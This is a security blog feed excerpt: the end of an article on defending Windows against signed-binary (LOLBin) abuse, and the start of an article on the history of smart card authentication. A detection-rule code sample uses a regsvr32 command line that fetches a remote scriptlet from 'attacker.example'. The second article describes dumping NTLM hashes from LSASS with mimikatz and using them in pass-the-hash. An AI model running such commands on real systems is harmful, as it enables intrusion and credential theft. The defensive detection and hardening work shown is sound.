We observed living-off-the-land binaries (LOLBINs) usage in 17% of investigations in Q3, up from 13% in H1 2025. -- Cybereason TTP Briefing Q3 2025 [@cybereason-q3-2025]
&lt;p&gt;A four-percentage-point quarter-over-quarter increase is not a noise-level move. It is the visible attacker-economics response to the SOTA: as enforcement layers improve at detecting unsigned third-party tooling, attackers shift further into the trust-by-signature space. The catalog grows because the incentive to find new LOLBins is growing.&lt;/p&gt;
&lt;p&gt;Two of the eight problems deserve a closer look. Smart App Control&apos;s silent-disable behavior is the most under-documented operational failure mode in the entire 2026 SOTA. The documented disable trigger is, in paraphrase, that SAC turns off when Microsoft&apos;s cloud service cannot make a confident prediction about the user&apos;s typical app usage [@ms-sac-overview]. The user-facing consequence is the same regardless of the exact wording: a Windows 11 endpoint that booted protected by SAC silently transitions to a state in which SAC does nothing. A recent Windows cumulative update added an in-place re-enable path that improved on the original wipe-and-reinstall requirement (see the Callout below), but it does not surface a disable event to administrators.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; SAC disables itself silently when it cannot make a high-confidence safety prediction. The disabled state used to be one-way; a recent Windows cumulative update added a re-enable path that no longer needs a clean install [@ms-sac-support]. But the disable itself still surfaces no admin signal. Plan defenses as if SAC is best-effort, not load-bearing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The other under-discussed problem is the PowerShell special case. PowerShell is the most-abused script host in Windows by a wide margin, and yet &lt;code&gt;powershell.exe&lt;/code&gt; is not on the App Control deny list and never has been. The reason is that Microsoft shipped a different answer specifically for PowerShell: Constrained Language Mode, AMSI script-content inspection, script-block logging (Event ID 4104), module logging (Event ID 4103), and over-the-shoulder transcription [@ms-ps-logging]. The PowerShell answer is &lt;em&gt;instrument deeply, do not deny&lt;/em&gt;. For the rest of the LOLBAS catalog the answer is &lt;em&gt;deny when feasible, detect otherwise&lt;/em&gt;. No published Microsoft criterion explains which strategy applies to a given binary; the choice is made one binary at a time inside Microsoft&apos;s security engineering organization.&lt;/p&gt;
&lt;p&gt;If the problems remain open, what can a practitioner actually do tomorrow? The playbook is the next section.&lt;/p&gt;
&lt;h2&gt;11. A 2026 LOLBin Defense Playbook&lt;/h2&gt;
&lt;p&gt;Even with the structural ceiling, a 2026 Windows shop can do a great deal. The playbook below is in rough order of operational priority: top items pay the biggest defensive dividend per hour of administrator time.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Deploy App Control for Business in &lt;em&gt;enforce&lt;/em&gt; mode with the Recommended Block Rules merged into the base policy.&lt;/strong&gt; This is the single highest-value step. Microsoft Learn publishes the deny-list XML and a step-by-step merge guide [@ms-bypass-rules]. For organizations that want a wider net than the official list, the &lt;code&gt;bohops/UltimateWDACBypassList&lt;/code&gt; community superset [@bohops-wdac] is the standard reference.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Where Smart App Control is eligible, enable it on clean-installed Windows 11 22H2+ endpoints.&lt;/strong&gt; Document the silent-disable failure mode in your incident runbook so an unexpectedly disabled SAC instance gets a ticket instead of being ignored. A recent Windows cumulative update added an in-place re-enable path inside the Windows Security app, so a disabled SAC is no longer a wipe-and-reinstall event (see Section 10) [@ms-sac-support].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Apply the LOLBin-relevant ASR rules in block mode&lt;/strong&gt; [@ms-asr-rules-ref]: &lt;em&gt;Block all Office applications from creating child processes&lt;/em&gt; (1709+), &lt;em&gt;Block executable content from email client and webmail&lt;/em&gt; (1709+), &lt;em&gt;Block JavaScript or VBScript from launching downloaded executable content&lt;/em&gt; (1709+), &lt;em&gt;Block use of copied or impersonated system tools&lt;/em&gt; (1709+), and &lt;em&gt;Block process creations originating from PSExec and WMI commands&lt;/em&gt; (1803+). Coverage on Windows 11 24H2 is uniform.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Deploy SwiftOnSecurity&apos;s &lt;code&gt;sysmon-config&lt;/code&gt; as a baseline&lt;/strong&gt; [@swiftonsec]; consider &lt;code&gt;olafhartong/sysmon-modular&lt;/code&gt; [@olafhartong] for tiered configuration. Tune the per-LOLBin detection patterns documented on each LOLBAS entry&apos;s &lt;em&gt;Detection&lt;/em&gt; field. The Splunk Research analytic &lt;code&gt;25689101-012a-324a-94d3-08301e6c065a&lt;/code&gt; for renamed-LOLBin moves is a good starting point for SIEM rule design [@splunk-detection].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Write detection content for the canonical eight.&lt;/strong&gt; Parent-child plus argument patterns for &lt;code&gt;regsvr32&lt;/code&gt;, &lt;code&gt;mshta&lt;/code&gt;, &lt;code&gt;certutil&lt;/code&gt;, &lt;code&gt;rundll32&lt;/code&gt;, &lt;code&gt;bitsadmin&lt;/code&gt;, &lt;code&gt;msbuild&lt;/code&gt;, &lt;code&gt;installutil&lt;/code&gt;, and &lt;code&gt;Microsoft.Workflow.Compiler.exe&lt;/code&gt; cover the bulk of real-world incidents. The Atomic Red Team test corpus for T1218.010 [@atomic-t1218] supplies ready-to-run validation payloads. Run them in audit mode against your detection content before relying on it in production.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Enable PowerShell script-block logging (Event ID 4104) and module logging (Event ID 4103).&lt;/strong&gt; Constrained Language Mode activates automatically when an App Control policy is in &lt;em&gt;enforce&lt;/em&gt; on the script file&apos;s location, so step 1 also pays for the PowerShell hardening.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Subscribe to LOLBAS GitHub releases.&lt;/strong&gt; New entries arrive every few weeks. Put the Recommended Block Rules page on the SOC&apos;s monthly review cadence so that a new XML version is integrated within one patch cycle.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Map your detections to MITRE ATT&amp;amp;CK technique IDs.&lt;/strong&gt; T1218 and its sub-techniques (.004, .005, .010, .011), T1127.001, T1216, T1197, T1140, and T1105 are the LOLBin-relevant nodes. The mapping lets the SOC coverage matrix and the LOLBAS catalog stay aligned.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;For the driver class, enable HVCI on supported hardware.&lt;/strong&gt; The Microsoft Vulnerable Driver Blocklist is enabled by default whenever HVCI, Smart App Control, or S mode is active [@ms-driver-blocklist]. Cross-reference &lt;code&gt;loldrivers.io&lt;/code&gt; [@loldrivers] for SIEM rule input.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s own guidance is to deploy every new App Control policy in &lt;em&gt;audit&lt;/em&gt; mode for two to four weeks before flipping to &lt;em&gt;enforce&lt;/em&gt;. The audit-mode telemetry surfaces business-critical workflows that depend on otherwise-deniable binaries (the &lt;code&gt;msbuild.exe&lt;/code&gt; developer-workstation case is the canonical example). The Recommended Block Rules deployment is no exception [@ms-bypass-rules].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A 2026 SOC&apos;s top-of-funnel LOLBin detection combines the parent-child pattern with argument inspection from Section 1, generalized across the canonical eight:&lt;/p&gt;
&lt;p&gt;{`
// The minimal cross-binary detection logic a SOC writes for the canonical
// eight LOLBins. Each rule is a parent-child pair plus an argument regex.
// Production rules add tuning fields (user-context allow-lists, signing
// chain checks, network destination reputation), but this is the spine.&lt;/p&gt;
&lt;p&gt;const RULES = [
  { name: &apos;Squiblydoo (regsvr32)&apos;,  parent: /(cmd|powershell|wscript|cscript|wmiprvse|winword|excel|outlook)\.exe$/i, child: /regsvr32\.exe$/i, args: /\/i:https?:/i },
  { name: &apos;Mshta remote&apos;,           parent: /(cmd|powershell|outlook|winword|excel)\.exe$/i, child: /mshta\.exe$/i, args: /(https?:|javascript:|vbscript:)/i },
  { name: &apos;Certutil download&apos;,      parent: /.&lt;em&gt;/i, child: /certutil\.exe$/i, args: /-urlcache.+-f\s+https?:/i },
  { name: &apos;Bitsadmin transfer&apos;,     parent: /.&lt;/em&gt;/i, child: /bitsadmin\.exe$/i, args: /\/transfer\s+/i },
  { name: &apos;Msbuild inline&apos;,         parent: /(cmd|powershell|wscript|cscript)\.exe$/i, child: /msbuild\.exe$/i, args: /\.(csproj|xml|build)\b/i },
  { name: &apos;InstallUtil /U&apos;,         parent: /(cmd|powershell)\.exe$/i, child: /installutil\.exe$/i, args: /\/u\s+/i },
  { name: &apos;Workflow.Compiler chain&apos;,parent: /.*/i, child: /(microsoft\.workflow\.compiler|wfc)\.exe$/i, args: /.+/i },
  { name: &apos;Rundll32 COM&apos;,           parent: /(cmd|powershell|wscript|cscript|winword|excel)\.exe$/i, child: /rundll32\.exe$/i, args: /(javascript:|url\.dll,fileprotocolhandler|shell32\.dll,shellexec_rundll)/i }
];&lt;/p&gt;
&lt;p&gt;function evaluate(event) {
  const matches = [];
  for (const r of RULES) {
    if (r.parent.test(event.parentImage || &apos;&apos;) &amp;amp;&amp;amp;
        r.child.test(event.image || &apos;&apos;) &amp;amp;&amp;amp;
        r.args.test(event.commandLine || &apos;&apos;)) {
      matches.push(r.name);
    }
  }
  return matches;
}&lt;/p&gt;
&lt;p&gt;const event = {
  parentImage: &apos;C:\\Windows\\System32\\cmd.exe&apos;,
  image:       &apos;C:\\Windows\\System32\\regsvr32.exe&apos;,
  commandLine: &apos;regsvr32 /s /n /u /i:http\u003a//attacker.example/x.sct scrobj.dll&apos;
};
console.log(&apos;Matched rules:&apos;, evaluate(event));
`}&lt;/p&gt;

For organizations operating under FedRAMP High or CMMC L3, the App Control for Business deployment is not optional. The controls that map to NIST SP 800-53 Rev. 5 controls AC-3 (access enforcement) and CM-7 (least functionality) [@nist-800-53-r5] effectively require a kernel-enforced application allow-list, and the Recommended Block Rules deny list is the published Microsoft baseline. The deployment work in step 1 of the playbook is therefore a compliance prerequisite as well as a security control.

After deploying an App Control policy in audit mode, validate that the policy is loaded with `CiTool.exe -lp` on Windows 11 22H2+. Audit-mode block events appear in the *Microsoft-Windows-CodeIntegrity/Operational* event log as Event ID 3076 (would-block) and *AppLocker/MSI and Script* event log as Event ID 8003 (audit). Run a known-benign workflow for two weeks and review the would-block events before flipping the policy to enforce.
&lt;p&gt;The playbook covers the controls Microsoft and the community ship today. The final pass is the set of misconceptions that survive even after the playbook: the FAQ.&lt;/p&gt;
&lt;h2&gt;12. Frequently Asked Questions and Closing&lt;/h2&gt;
&lt;p&gt;The structural argument leaves a small number of recurring questions that even an experienced Windows defender asks the first time they read the LOLBAS catalog end to end. The seven below are the ones that matter most.&lt;/p&gt;

No. An Authenticode signature is immutable per signed file: once a file is signed and shipped, the signature travels with the bytes forever. Revocation does not work by removing the signature. It works by adding the binary to a deny list that the loader checks alongside the signature. That deny list is the App Control Recommended Block Rules XML [@ms-bypass-rules]. There is no global mechanism by which Microsoft can retroactively &quot;unsign&quot; a binary that already exists on customer disks, because the binary&apos;s bytes have not changed.

Because PowerShell Constrained Language Mode, AMSI script-content inspection, script-block logging (Event ID 4104), and module logging (Event ID 4103) [@ms-ps-logging] together constitute Microsoft&apos;s specific answer for PowerShell. The strategy is *instrument deeply, do not deny*. For the rest of the LOLBin catalog the strategy is *deny when feasible, detect otherwise*. The choice is made one binary at a time; no published Microsoft criterion explains when each applies. PowerShell is the only Microsoft-shipped example of the *instrument* strategy applied at full depth.

Partially, and only on eligible endpoints (clean-installed Windows 11 22H2 or later, with sufficient device telemetry to keep SAC in *enforce* mode). SAC explicitly delegates LOLBin handling to the App Control Recommended Block Rules deny list -- the Microsoft Learn SAC overview page contains the verbatim sentence pointing administrators at *Application Control for Windows* for the LOLBin list [@ms-sac-overview]. SAC&apos;s enforcement model is reputation-and-AI, not deny-list. It silently disables itself on insufficient signal. Until recently the only fix was to reinstall Windows; a recent Windows cumulative update added an in-place re-enable path inside the Windows Security app [@ms-sac-support], but the silent disable itself remains (see Section 10).

Yes. As of May 26, 2026, the repository is receiving regular pull requests, has 8,567 stars and 1,135 forks per the GitHub API [@lolbas-org-api], and the editorial maintainers (Moe, Bayne, Richard, Spehn, Somerville, Beukema, Hernandez) are actively reviewing submissions. The catalog has grown from 130 binaries at the original 2018 founding to 207 in the May 2026 enumeration. New entries arrive every few weeks.

Yes. The LOLDrivers project at `loldrivers.io` [@loldrivers] catalogs vulnerable signed kernel drivers -- the driver-class analogue of LOLBAS. Microsoft&apos;s own Vulnerable Driver Blocklist is enabled by default when HVCI, Smart App Control, or S mode is active [@ms-driver-blocklist]. GTFOBins at `gtfobins.github.io` [@gtfobins] is the Unix analogue, cataloging vendor-shipped utilities on Linux and BSD with attacker-useful side effects. The three projects share the same conceptual move applied to different trust surfaces.

No. The LOLBAS README itself attributes the project&apos;s foundational talk to Oddvar Moe&apos;s *#LOLBins -- Nothing to LOL about!* at DerbyCon 8 in October 2018 [@youtube-moe-lolbins] [@derbycon8-moe]. The 2017 BlueHat IL talk by Matt Graeber and Casey Smith [@bluehat-il-mirror] is one earlier intellectual ancestor, and the canonical *misplaced trust* framing was named the following year in Matt Graeber and Lee Christensen&apos;s *Subverting Trust in Windows* at TROOPERS 2018 [@specterops-subverting-trust]; both predate the LOLBAS catalog and neither is the project&apos;s founding event. Several secondary sources conflate the talks; the primary attribution chain is the LOLBAS README.

Merge the App Control Recommended Block Rules XML into a managed App Control base policy and roll it out in audit mode for two to four weeks before flipping to enforce [@ms-bypass-rules]. The audit-mode telemetry surfaces the legitimate-but-rare workflows that would break under enforce; the enforce-mode policy then denies roughly 40 of the highest-impact LOLBins by default. Given the Cybereason Q3 2025 finding that 17 percent of investigations involved LOLBins [@cybereason-q3-2025], the effort pays for itself within the first quarter after deployment.
&lt;h3&gt;Closing&lt;/h3&gt;
&lt;p&gt;Every Windows binary that ships with a Microsoft signature is a LOLBin candidate, because the &lt;em&gt;signature&lt;/em&gt; trust axis is orthogonal to the &lt;em&gt;behavior&lt;/em&gt; trust axis. That gap was designed into Authenticode in 1996, inherited by AppLocker in 2009, made unignorable by Casey Smith&apos;s Squiblydoo in 2016, catalogued by Oddvar Moe and the LOLBAS maintainers starting in 2018, and partially fenced off by Microsoft&apos;s App Control Recommended Block Rules between 2017 and 2024. The class will be there when the next reader of this article shows up. Closing it would require either rebuilding the Windows system-administration model or attaching behavioral capability descriptions to every signed Microsoft binary on disk. Microsoft has published no roadmap for either, and the installed base could not absorb either without breaking decades of administrative tooling.&lt;/p&gt;
&lt;p&gt;The honest defender&apos;s posture is therefore not to ask &lt;em&gt;when will Microsoft fix this?&lt;/em&gt; but &lt;em&gt;how thin can the layered SOTA make the residual?&lt;/em&gt;. The answer in 2026 is &lt;em&gt;thinner than it was in 2016, but the gap between LOLBAS and the Recommended Block Rules (Section 8) is not going to close&lt;/em&gt;. Subscribe to the LOLBAS repository [@lolbas-github]. Bookmark the Recommended Block Rules page [@ms-bypass-rules]. Treat the next entry the catalog ships as a detection-engineering task to schedule, not a Microsoft bug to wait on.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;living-off-the-land-on-windows&quot; keyTerms={[
  { term: &quot;LOLBin&quot;, definition: &quot;Living-Off-the-Land Binary: a Microsoft-signed Windows executable with attacker-useful primitives, catalogued in LOLBAS.&quot; },
  { term: &quot;Authenticode&quot;, definition: &quot;Microsoft&apos;s 1996 code-signing scheme. Answers who signed a binary; does not characterize runtime behavior.&quot; },
  { term: &quot;AppLocker&quot;, definition: &quot;Windows 7 application-allow-list with publisher/path/hash rules. Default rule admits Microsoft-signed binaries; superseded by App Control for Business.&quot; },
  { term: &quot;App Control for Business&quot;, definition: &quot;Kernel-mode application-control system formerly known as WDAC. Ships with Windows 10 1709+.&quot; },
  { term: &quot;Smart App Control&quot;, definition: &quot;Windows 11 22H2+ reputation-based application gate. Silently disables itself on insufficient signal; defers LOLBins to the App Control deny list.&quot; },
  { term: &quot;Recommended Block Rules&quot;, definition: &quot;Microsoft-curated XML deny list of ~40 binaries shipped via Microsoft Learn. The shipping deny-list mechanism for individual LOLBins.&quot; },
  { term: &quot;Squiblydoo&quot;, definition: &quot;Casey Smith&apos;s April 19, 2016 regsvr32 abuse using the /i:URL switch to fetch and execute a remote .sct scriptlet. Tracked as MITRE T1218.010.&quot; },
  { term: &quot;AMSI&quot;, definition: &quot;Antimalware Scan Interface (Windows 10 1507+). In-process script-content inspection for PowerShell, JScript, VBScript, and .NET.&quot; },
  { term: &quot;Constrained Language Mode&quot;, definition: &quot;A PowerShell execution mode that restricts the language surface to a safe subset. Enforced automatically when App Control is in enforce on the script file&apos;s location.&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-protected Code Integrity. Hardware-virtualization-enforced kernel CI; activates the Microsoft Vulnerable Driver Blocklist by default.&quot; },
  { term: &quot;MITRE T1218&quot;, definition: &quot;System Binary Proxy Execution. The MITRE ATT&amp;amp;CK technique node for the LOLBin family; sub-techniques include .004 InstallUtil, .005 Mshta, .010 Regsvr32, .011 Rundll32.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>lolbins</category><category>app-control</category><category>authenticode</category><category>detection-engineering</category><category>wdac</category><category>smart-app-control</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Card That Wasn&apos;t a Card: How Windows Authentication Outgrew the Smart Card Metaphor</title><link>https://paragmali.com/blog/the-card-that-wasnt-a-card-how-windows-authentication-outgre/</link><guid isPermaLink="true">https://paragmali.com/blog/the-card-that-wasnt-a-card-how-windows-authentication-outgre/</guid><description>Smart cards, virtual smart cards, and Windows authentication 1996-2026: from PC/SC and PIV through the 2014 NTLM-secondary defect to WHfB and FIDO2.</description><pubDate>Tue, 26 May 2026 00:00:00 GMT</pubDate><content:encoded>
**The Windows smart card story is the story of a metaphor.** Roland Moreno&apos;s 1974 &quot;card with a secret&quot; became Windows 2000&apos;s `SCardSvr.exe`, then Windows 8&apos;s TPM Virtual Smart Card (a software card with the same PC/SC interface), then Windows Hello for Business (which threw the card edge away and talks to the TPM directly), then FIDO2 (which added the origin binding the card was never designed for). The cryptographic primitive -- a non-exportable asymmetric key under a local gesture -- survives every transition. The 2014 disclosure that smart-card-required accounts still mint a harvestable NTLM hash is closed not by any change to the card but by Microsoft&apos;s 2024-2026 NTLM removal plan. The card was always cryptographically sound; the protection terminated at the act of signing.
&lt;h2&gt;1. A Smart Card Login That Mints an NTLM Hash&lt;/h2&gt;
&lt;p&gt;Picture May 2014. A Department of Defense contractor pushes her Common Access Card into a Windows 7 workstation, types a six-digit PIN, and watches the lock screen melt into her desktop. The RSA-2048 private key that just signed her &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos&lt;/a&gt; pre-authentication blob lives inside a tamper-resistant secure element she cannot extract from the card. The cryptography is excellent. Three hours later, an attacker on the same network owns her domain account without ever touching the card [@dirteam-aorato] [@kb-2871997].&lt;/p&gt;
&lt;p&gt;How is that even possible? Hold that question. The answer is the spine of this article.&lt;/p&gt;
&lt;p&gt;The contractor here is a composite figure, not a documented incident. The mechanism (CAC + Windows 7, RSA-2048 signing inside the card, an NT hash recoverable from LSASS three hours later) is the one Aorato disclosed in 2014 [@dirteam-aorato] and Microsoft documented in KB 2871997 [@kb-2871997]. The scenario is faithful to the published attack chain; the person and the office park are illustrative.&lt;/p&gt;
&lt;p&gt;The protocol that ran when she logged in is PKINIT, defined by &lt;a href=&quot;#&quot; rel=&quot;noopener&quot;&gt;RFC 4556&lt;/a&gt; [@rfc-4556] and profiled for Windows in &lt;code&gt;[MS-PKCA]&lt;/code&gt; [@ms-pkca]. PKINIT lets a Kerberos client present an X.509 certificate as pre-authentication for the Authentication Service Request (AS-REQ), with a digital signature proving possession of the matching private key. In a Windows smart card logon the signing happens inside the card. The Microsoft Smart Card Key Storage Provider hands the card a hash; the card returns a signed &lt;code&gt;AuthPack&lt;/code&gt; containing a &lt;code&gt;PKAuthenticator&lt;/code&gt; (timestamp, nonce, paChecksum) and Diffie-Hellman parameters; that signed &lt;code&gt;AuthPack&lt;/code&gt; rides in the &lt;code&gt;PA-PK-AS-REQ&lt;/code&gt; pre-authentication data of the AS-REQ [@rfc-4556] [@ms-pkca].&lt;/p&gt;
&lt;p&gt;So far, so good. The Key Distribution Center (KDC) verifies the signature, validates the certificate chain, mints a Ticket-Granting Ticket (TGT), and returns it. Our contractor sees her desktop.&lt;/p&gt;
&lt;p&gt;But the KDC has a second job she does not know about. Her account is flagged &quot;smart card required for interactive logon,&quot; so she has no password. Windows must still authenticate her to a legacy SMB1 server or any network application that speaks only NTLM. The clean answer would be &quot;it cannot.&quot; The answer Microsoft shipped in Windows 2000 is: the KDC silently maintains an NTLM-equivalent secondary credential for every smart-card-only user, rotating it at logon, so legacy services keep working [@kb-2871997] [@msrc-kb-2871997].&lt;/p&gt;
&lt;p&gt;That secondary credential is an NT hash. Once her session is live, an NT hash sits in the Local Security Authority Subsystem (LSASS) memory of every machine she touches. The smart card never sees it. The card cannot police it. It is sixteen bytes of MD4 output that the OS minted around the cryptographic operation the card refused to delegate.&lt;/p&gt;

A non-NTLM-derived NT hash that Windows maintains for accounts configured to log on with a smart card or other non-password credential, so that legacy NTLM-accepting services (SMB1, pre-Windows-2000 applications, some printers) continue to authenticate the user. The hash is computed from a random secret, not the card key, and is rotated by the KDC. From a pass-the-hash attacker&apos;s perspective, it is indistinguishable from a password-derived hash and equally replayable.
&lt;p&gt;Three hours later, an attacker who has phished a privileged helpdesk account runs &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; from a copy of &lt;code&gt;mimikatz&lt;/code&gt; [@mimikatz-gh] against the LSASS process on a server the contractor logged into earlier that day. The output looks like &lt;code&gt;NTLM : a1b2c3...&lt;/code&gt;. The attacker pipes that NT hash into a &lt;code&gt;pass-the-hash&lt;/code&gt; against any NTLM-accepting service in the forest. Because &lt;a href=&quot;#&quot; rel=&quot;noopener&quot;&gt;RFC 4757&lt;/a&gt; [@rfc-4757] makes the RC4-HMAC Kerberos long-term key identical to the NT hash, the attacker can also forge Kerberos pre-authentication for the smart-card-required account and request its TGT. The card sat in a reader the attacker never touched. None of that mattered.&lt;/p&gt;
&lt;p&gt;This is the inversion the article exists to explain. The card protected the key. The card did not, and could not, protect the identity. Microsoft documented the gap on May 13, 2014 as KB 2871997, &quot;Update to improve credentials protection and management&quot; [@kb-2871997]; the Microsoft Security Response Center followed with a blog overview of the threat model and the defence-in-depth response [@msrc-kb-2871997]. The disclosure came from Tal Be&apos;ery and his team at Aorato, a Tel Aviv security startup Microsoft would acquire six months later. The period-accurate operator analysis lives in Sander Berkouwer&apos;s July 15, 2014 writeup, cited here because the original Aorato post is offline [@dirteam-aorato].&lt;/p&gt;
&lt;p&gt;How did Windows arrive at an architecture where a tamper-resistant cryptographic token could leave the user&apos;s identity wide open? To answer that we go back to a 1974 patent in Paris.&lt;/p&gt;
&lt;h2&gt;2. How Cards Got a Chip&lt;/h2&gt;
&lt;p&gt;Roland Moreno was twenty-nine when he filed his first smart-card patent family in 1974. A self-taught Parisian, a former pinball-machine fixer and humorist who had washed out of the Sorbonne, he wired an off-the-shelf microchip to a ring of contacts on a small plastic substrate and walked the result over to INPI, the French patent office. The patent family -- known in the secondary literature as &lt;code&gt;carte a memoire&lt;/code&gt; -- did not invent the integrated circuit, the credit-card form factor, or even the idea of embedding silicon in plastic. What Moreno added was a property: the card holds a secret the cardholder cannot extract [@wp-moreno] [@wp-smart-card].&lt;/p&gt;
&lt;p&gt;That property is the entire story.&lt;/p&gt;
&lt;p&gt;Helmut Groettrup, a West German engineer, got there first. He filed German patents DE1574074 and DE1574075 in February 1967 for a tamper-proof identification switch based on a semiconductor device, and added a joint Austrian filing with Juergen Dethloff in September 1968 [@bmpos-history] [@wp-smart-card]. The standard French historiography credits Moreno with the secured-memory refinement rather than the form factor. The inventor question depends on which property you treat as load-bearing.&lt;/p&gt;
&lt;p&gt;Three other people belong in this section. In 1977 Michel Ugon, an engineer at Honeywell Bull&apos;s CP8 division in France, built the first microprocessor smart card -- a card with a CPU on it, not just memory. In 1978 Bull filed the SPOM patent that collapsed CPU and EEPROM onto one chip, the architectural change that made mass production tractable [@bmpos-history] [@cnam-pdf]. And from 1987 to 1995 the International Organization for Standardization froze the card edge into a vendor-neutral wire format with the four parts of ISO/IEC 7816 [@wp-smart-card]: physical characteristics, electrical and transmission protocols, and -- the part that would matter most for Windows -- the command set.&lt;/p&gt;

The international standard for contact smart cards, in four parts that interest software architects: Part 1 covers physical characteristics, Part 3 covers electrical interface and the T=0 and T=1 transmission protocols, and Part 4 covers the organisation, security, and command set for interchange. ISO/IEC 7816-4:2020 is the current edition of Part 4.

Application Protocol Data Unit. The request/response unit a host application exchanges with a smart card. The command APDU starts with a four-byte header `CLA INS P1 P2` (class, instruction, two parameter bytes), followed by an optional length byte `Lc` and `Lc` bytes of data, and an optional expected-response-length byte `Le`. The response APDU is `[data] SW1 SW2`, where the two status word bytes encode success or a card-side error.
&lt;p&gt;A worked APDU example makes this concrete. To select the PIV application on a smart card, a host sends &lt;code&gt;00 A4 04 00 0B A0 00 00 03 08 00 00 10 00 01 00&lt;/code&gt;. The first byte is &lt;code&gt;CLA = 00&lt;/code&gt; (interindustry class). The second is &lt;code&gt;INS = A4&lt;/code&gt; (SELECT). &lt;code&gt;P1 = 04&lt;/code&gt; indicates that the parameter is an application identifier. &lt;code&gt;P2 = 00&lt;/code&gt; selects the first occurrence. &lt;code&gt;Lc = 0B&lt;/code&gt; says eleven data bytes follow, and those eleven bytes are the full PIV AID per NIST SP 800-73-4 [@sp-800-73-4-upd1]: nine bytes for the registered application identifier (&lt;code&gt;A0 00 00 03 08 00 00 10 00&lt;/code&gt;) followed by the two-byte PIV application version identifier (the PIX, &lt;code&gt;01 00&lt;/code&gt;, per SP 800-73-4 Part 1 §2.2). The card replies with optional file control information and the status word &lt;code&gt;90 00&lt;/code&gt;, which means success. Every operation the Windows smart card stack performs decomposes, eventually, into a sequence of these short frames.&lt;/p&gt;

timeline
    title Card-as-authenticator timeline
    1967-1968 : Groettrup and Dethloff file IC-on-card patent
    1974 : Moreno files carte a memoire family
    1977-1978 : Ugon and Bull build CPU smart card and SPOM
    1987-1995 : ISO/IEC 7816 parts 1, 3, 4 published
    1996 : PC/SC Workgroup founded
    2000 : Windows 2000 ships SCardSvr.exe
    2007 : Microsoft Base Smart Card CSP and minidriver model
    2011 : Windows 7 SP1 inbox PIV/GIDS minidriver
    2012 : Windows 8 ships Virtual Smart Card
    2015 : Windows Hello announced
    2024 : NTLMv1 removed in Windows 11 24H2
&lt;p&gt;By 1996 the card edge was settled. Three thousand-odd APDU specifications and proprietary applets later, the only remaining question was: how does a personal computer talk to a card reader? Smart card readers lived in two operationally incompatible worlds, the bank-teller world and the workstation world, and the workstation world was held back by a vendor-driver swamp. So in 1996 a consortium called the PC/SC Workgroup formed. The contemporary record names Microsoft, IBM, Hewlett-Packard, Sun Microsystems, Siemens Nixdorf, and Bull as founders, with Schlumberger and other card vendors joining shortly after [@wp-pcsc] [@sc-architecture].&lt;/p&gt;
&lt;p&gt;The PC/SC specification series (&quot;Interoperability Specification for ICCs and Personal Computer Systems&quot;) names exactly the right abstractions: a Smart Card Resource Manager that brokers access to attached readers, an Interface Device Handler that abstracts reader hardware, and a Service Provider that exposes a uniform programming surface to applications [@sc-architecture]. A personal computer talks to a smart card by speaking PC/SC, in user-mode, through whatever service the OS provides.&lt;/p&gt;

Personal Computer/Smart Card. The 1996 industry consortium and its specification series that define how a smart card reader is exposed to a desktop operating system. PC/SC factors the stack into reader hardware (Interface Device), an Interface Device Handler driver, a Smart Card Resource Manager (a system service brokering access), and a Service Provider exposing a uniform API to applications.
&lt;p&gt;Microsoft answered the implementation question in February 2000 with &lt;code&gt;SCardSvr.exe&lt;/code&gt;, the Smart Cards for Windows service that shipped in Windows 2000 [@sc-architecture]. And immediately created a new problem: every card vendor still wanted to own the cryptographic provider.&lt;/p&gt;
&lt;h2&gt;3. From SCardSvr to Base CSP: Eleven Years to a Vendor-Neutral Stack&lt;/h2&gt;
&lt;p&gt;Windows 2000 shipped smart card logon as a vendor-neutral primitive. Within months, the operational reality bit. Every card vendor shipped a different CryptoAPI plug-in, every plug-in needed installing per machine, per card, sometimes per user.&lt;/p&gt;
&lt;p&gt;Walk down the stack. At the bottom is the reader, attached over USB or, in early-2000s deployments, an internal serial port. Above the reader is the Interface Device Handler driver supplied by the reader vendor. Above the driver is &lt;code&gt;SCardSvr&lt;/code&gt;, Microsoft&apos;s Smart Card Resource Manager service. &lt;code&gt;SCardSvr&lt;/code&gt; exposes a user-mode API called WinSCard: &lt;code&gt;SCardEstablishContext&lt;/code&gt;, &lt;code&gt;SCardConnect&lt;/code&gt;, &lt;code&gt;SCardTransmit&lt;/code&gt;, &lt;code&gt;SCardDisconnect&lt;/code&gt; [@winscard-api]. WinSCard is the C-level entry into PC/SC; an application that wants to send raw APDUs to a card uses WinSCard directly [@sc-architecture].&lt;/p&gt;

The Windows user-mode API surface for PC/SC. Canonical entry points include `SCardEstablishContext`, `SCardListReaders`, `SCardConnect`, `SCardTransmit`, and `SCardDisconnect`. An application sending raw APDUs to a smart card uses WinSCard; higher-level Windows components (Kerberos client, certificate enrolment, the lock-screen credential provider) reach the card indirectly through the Cryptographic Service Provider or Key Storage Provider layers.
